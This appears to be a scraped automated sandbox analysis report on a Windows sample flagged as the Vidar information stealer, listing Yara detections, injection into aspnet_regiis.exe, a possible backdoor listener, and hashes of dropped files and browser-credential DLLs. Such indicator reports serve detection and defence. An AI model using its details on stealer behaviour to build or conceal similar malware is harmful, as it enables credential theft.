Source: Yara match	File source: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC50C40 sqlite3_bind_zeroblob,	3_2_6CC50C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC50D60 sqlite3_bind_parameter_name,	3_2_6CC50D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB78EA0 sqlite3_clear_bindings,	3_2_6CB78EA0

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1524654
Product:	CloudBasic
Start time:	03:25:13
Start date:	03.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	d5251bd2a4d9ee464b1dbb25245a67a7
SHA1:	a89c28d0c6f39475cf96c2129c4d10d73d0aa4b4
SHA256:	5aa5f829532b82d1d146841d843de9d3ab2278ba2c52402d51d18a5a2823872f
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\CAAAAFBKFI.exe	ASCII text, with no line terminators	AEE9784C03B80D38D3271CDE2B252B8D	E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524	27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
C:\ProgramData\IDHIIJJJKEGI\BGIIEG	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	643AC1E34BE0FDE5FA0CD279E476DF3A	241B9EA323D640B82E8085803CBE3F61FEEA458F	C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
C:\ProgramData\IDHIIJJJKEGI\CBGCBK	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\ProgramData\IDHIIJJJKEGI\CBKJEG	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\IDHIIJJJKEGI\CFBFHI	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	C1AE02DC8BFF5DD65491BF71C0B740A7	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
C:\ProgramData\IDHIIJJJKEGI\DBFIEH	ASCII text, with very long lines (1765), with CRLF line terminators	4580799F1DC5720A7EC1766400E98740	92FD30F47EC545245B934EA492B3C64D5E609AA9	57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
C:\ProgramData\IDHIIJJJKEGI\DHJDAK	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1	7B955D976803304F2C0505431A0CF1CF	E29070081B18DA0EF9D98D4389091962E3D37216	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
C:\ProgramData\IDHIIJJJKEGI\EHIJDH	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\IDHIIJJJKEGI\EHIJDH-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\IDHIIJJJKEGI\HDGCFH	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	507BA3B63F5856A191688A30D7E2A93A	1B799649D965FF1562753A9EB9B04AC83E5D7C57	10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
C:\ProgramData\IDHIIJJJKEGI\HDGCFH-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\IDHIIJJJKEGI\JDBFII	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\IDHIIJJJKEGI\JJKFBA	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\ProgramData\IDHIIJJJKEGI\KKKEBK	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4	7A03CC0EAD0AEFF210C3E60823AAA5EC	8B9C99FBEC440663C71F10F70B9386C68CF0EC1D	D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log	ASCII text, with CRLF line terminators	84CFDB4B995B1DBF543B26B86C863ADC	D2F47764908BF30036CF8248B9FF5541E2711FA2	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\a43486128347[1].exe	ASCII text, with no line terminators	AEE9784C03B80D38D3271CDE2B252B8D	E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524	27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\76561199780418869[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators	2D2B0BE510590CE0A0E7185150678633	E8118C92C257C5E3BFCB2DDDA851F02D9A99BBF0	14054ABADFD5540F5CC3B80EA7D2A0B26CD158BD63223E7EE4E3CF34DBC0011A
C:\Users\user\AppData\Local\Temp\delays.tmp	ASCII text, with very long lines (65536), with no line terminators	2A8888F6512F29288846E65FB6F83C9B	6147D53026A83E59234FF853BB2B558B208B423F	4AEF39E4090B33644513AB820B07DDFA7DB4F8C9A3B201E2D789433D6D20BECC
C:\Users\user\AppData\Roaming\msvcp110.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	A7303605203C978ABBEFB4033275FF0C	6779D8CEB4551F3DBA684645EE2E794C3ADE90B5	0B1BB1E0D8BF15E28CC4528BF52153429B6318FD61B3733B6B8C86947820BFF4
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	DCD88EA6B7305254DE47653C23AEB417	CF9B3AFC4F2D6B2775780C4FEAA3C4B0633A6BE9	D952AB8B198AFDC603CEE5F43625F6F7843739C63729FDE7B314100F5A153643

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by